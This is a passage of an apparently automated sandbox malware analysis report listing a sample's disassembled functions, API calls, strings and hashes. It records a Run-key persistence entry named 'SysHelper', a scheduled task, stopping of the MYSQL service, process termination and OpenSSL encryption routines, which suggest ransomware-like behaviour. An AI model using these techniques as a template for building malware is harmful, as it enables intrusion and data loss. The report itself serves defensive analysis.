                                                                                                                                                                        • Opcode Fuzzy Hash: b184a37ac7376f3dfd1534dad110d88a5b9f3309d516f863412703ff77ac13ec
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A318935A402099BDB20DFBADC467EE77F8DF44721F1046A5E815E71E1EB709D408B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BE4AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75registrywindowCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00BE4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00BE480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00BE1D37,00000000,00B9CDAE,00000001,00000001), ref: 00BE4AFA
                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00BE4B05
                                                                                                                                                                        • __vfwprintf_p.LIBCMT ref: 00BE4B27
                                                                                                                                                                          • Part of subcall function 00BBBDCC: _vfprintf_helper.LIBCMT ref: 00BBBDDF
                                                                                                                                                                        • vswprintf.LIBCMT ref: 00BE4B5D
                                                                                                                                                                        • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00BE4B7E
                                                                                                                                                                        • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00BE4BA2
                                                                                                                                                                        • DeregisterEventSource.ADVAPI32(00000000), ref: 00BE4BA9
                                                                                                                                                                        • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00BE4BD3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                                                                                        • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                                                                                        • API String ID: 277090408-1348657634
                                                                                                                                                                        • Opcode ID: 769aa327a28579fb18adb5c2e8b10ca2f3d6958b50ad2db44df4a60beabf81b2
                                                                                                                                                                        • Instruction ID: 8973d0da480c0ada851154260e52dc7591aefca4fba3a7d2e6bbf8a6e55dd830
                                                                                                                                                                        • Opcode Fuzzy Hash: 769aa327a28579fb18adb5c2e8b10ca2f3d6958b50ad2db44df4a60beabf81b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 4321AF75A48340AFE770AB60CC87FEF77D8AF88701F404869B699961D0EFF494808653
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA2389
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA23B6
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 00BA23DE
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00BA23E7
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA23F4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA23FF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA240E
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 00BA2422
                                                                                                                                                                        Strings
                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00BA237F
                                                                                                                                                                        • SysHelper, xrefs: 00BA23D6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                        • API String ID: 122392481-4165002228
                                                                                                                                                                        • Opcode ID: 64711f333accf80da3a56e6d8af1da6a1d865288d173d4bb2c59f0bea2013448
                                                                                                                                                                        • Instruction ID: 2a9fad6a7ca438a69f12b0cef85471de875bb1c2ca286342bd7e56a2e802b1bd
                                                                                                                                                                        • Opcode Fuzzy Hash: 64711f333accf80da3a56e6d8af1da6a1d865288d173d4bb2c59f0bea2013448
                                                                                                                                                                        • Instruction Fuzzy Hash: FB11177595030DAFDF10DBA0DC89FEE77BCFB04705F0045A5B519E2191DBB49A849B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA8000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: fa0c6424024cafd3037a70cc3c9531a7cabe4786bafa405fea23908304f77c66
                                                                                                                                                                        • Instruction ID: 8b89014aae9aa6d3e0db7305d15d94427835733d12a5580e8abad1c3244661b2
                                                                                                                                                                        • Opcode Fuzzy Hash: fa0c6424024cafd3037a70cc3c9531a7cabe4786bafa405fea23908304f77c66
                                                                                                                                                                        • Instruction Fuzzy Hash: 87C15D71708609DFDB28CF48C8C19AE77E6EF46704B244969F891CBB41DB30ED558B94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00B9DAEB
                                                                                                                                                                        • CoCreateInstance.OLE32(00C64F6C,00000000,00000001,00C64F3C,?,?,00C5A948,000000FF), ref: 00B9DB0B
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00B9DBD6
                                                                                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00C5A948,000000FF), ref: 00B9DBE3
                                                                                                                                                                        • _memset.LIBCMT ref: 00B9DC38
                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00B9DC92
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                                                                                        • API String ID: 330603062-1376107329
                                                                                                                                                                        • Opcode ID: 44d3451b90d64fe913cd8ae887fc2e7ad90ac99e7b164b3b6594af6330f647d4
                                                                                                                                                                        • Instruction ID: 6778f3d5b1323e7232463fb08462d5acb4c630c1f14c444dc14b8426f854cd2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 44d3451b90d64fe913cd8ae887fc2e7ad90ac99e7b164b3b6594af6330f647d4
                                                                                                                                                                        • Instruction Fuzzy Hash: EA51F474A40209AFDB00DF94CC89FAE7BB9FF48B05F108568F505AB290DBB5A945CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00BA1A1D
                                                                                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00BA1A32
                                                                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00BA1A46
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A5B
                                                                                                                                                                        • Sleep.KERNEL32(?), ref: 00BA1A75
                                                                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00BA1A80
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1A9E
                                                                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00BA1AA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                                                                                        • String ID: MYSQL
                                                                                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                                                                                        • Opcode ID: 5e208b5cce6a29b013bda5f46b1974675903fc7695e021025dac004544746d71
                                                                                                                                                                        • Instruction ID: 4d11aa72b36797231d999b1bd37ec91414652c5180bd96b4fa3f0570461adb9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 5e208b5cce6a29b013bda5f46b1974675903fc7695e021025dac004544746d71
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F117339A05305AFDB605B98DCC8FAF7BECDB86752F140551FA10F2180D724D985CAA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BDF26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF27F
                                                                                                                                                                          • Part of subcall function 00BC0CFC: std::exception::_Copy_str.LIBCMT ref: 00BC0D15
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF294
                                                                                                                                                                          • Part of subcall function 00BC0ECA: RaiseException.KERNEL32(?,?,00BDF299,?,?,?,?,?,?,?,00BDF299,?,00C98238,?), ref: 00BC0F1F
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2AD
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2C2
                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00BDF2D4
                                                                                                                                                                          • Part of subcall function 00BDEF74: std::exception::exception.LIBCMT ref: 00BDEF8E
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF2E2
                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 00BDF2FB
                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00BDF310
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                        • String ID: bad function call
                                                                                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                                                                                        • Opcode ID: 8388a8a8b19e79f2198991f2801bbb17e31376f1b55ffb2c4dea933fa4293f3d
                                                                                                                                                                        • Instruction ID: fddfa323bb641090063ee8f95afb37b824878baaf0f8276250a1cbda4dc45d61
                                                                                                                                                                        • Opcode Fuzzy Hash: 8388a8a8b19e79f2198991f2801bbb17e31376f1b55ffb2c4dea933fa4293f3d
                                                                                                                                                                        • Instruction Fuzzy Hash: E911B974D4020DBBCF00FFA4C58ADDEBBBCEA04744F4085AABD2597641EB74A3498B91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF5480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00BF54C8
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF54D4
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00BF54F7
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00BF5503
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00BF5531
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00BF555B
                                                                                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00BF55F5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                                                                                        • Opcode ID: 4346472efd527898710ce74960857e10ed7531ffe9c30e29ee9ffc1fdaf4e9b9
                                                                                                                                                                        • Instruction ID: a053f3a33f354d1769e40be1091f16b31880361323f42d2bb8ade4cc28954c51
                                                                                                                                                                        • Opcode Fuzzy Hash: 4346472efd527898710ce74960857e10ed7531ffe9c30e29ee9ffc1fdaf4e9b9
                                                                                                                                                                        • Instruction Fuzzy Hash: D3515835A40709BBEB306BA48C43FBE77E9EF55B11F0440A5FB01BB1C2DAA15D0586A2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA2440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00BA244F
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00BA2469
                                                                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BA24A1
                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00BA24B0
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24B7
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00BA24C1
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BA24CD
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                        • String ID: cmd.exe
                                                                                                                                                                        • API String ID: 2696918072-723907552
                                                                                                                                                                        • Opcode ID: b0689dd95bf0f070927cf4c2d1711e006f13fe8b5d00e27ef00c2a74c11fd15c
                                                                                                                                                                        • Instruction ID: 2fee51e465a52a5aa8a25946172565f6704307948751eca5439f8dfcfd497352
                                                                                                                                                                        • Opcode Fuzzy Hash: b0689dd95bf0f070927cf4c2d1711e006f13fe8b5d00e27ef00c2a74c11fd15c
                                                                                                                                                                        • Instruction Fuzzy Hash: 210175395013157FEB206BA5AC8DFAF77ACEF49755F0000A1FE08E2141EB7499848AB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                                                                                        • Opcode ID: 101eba236b91e45ec5c310c1a67a55ee9d947b1cc449e249efe44f473dab464a
                                                                                                                                                                        • Instruction ID: 607c1b9985689d4279c1b45aae92c7fdad1cf5f1a6be0f6ef700dad108aa2abb
                                                                                                                                                                        • Opcode Fuzzy Hash: 101eba236b91e45ec5c310c1a67a55ee9d947b1cc449e249efe44f473dab464a
                                                                                                                                                                        • Instruction Fuzzy Hash: 7CA153B1C00249DBEF11EFE4C846BEEBFB5AF15314F140478E40576292D7B65649CBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BF3350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
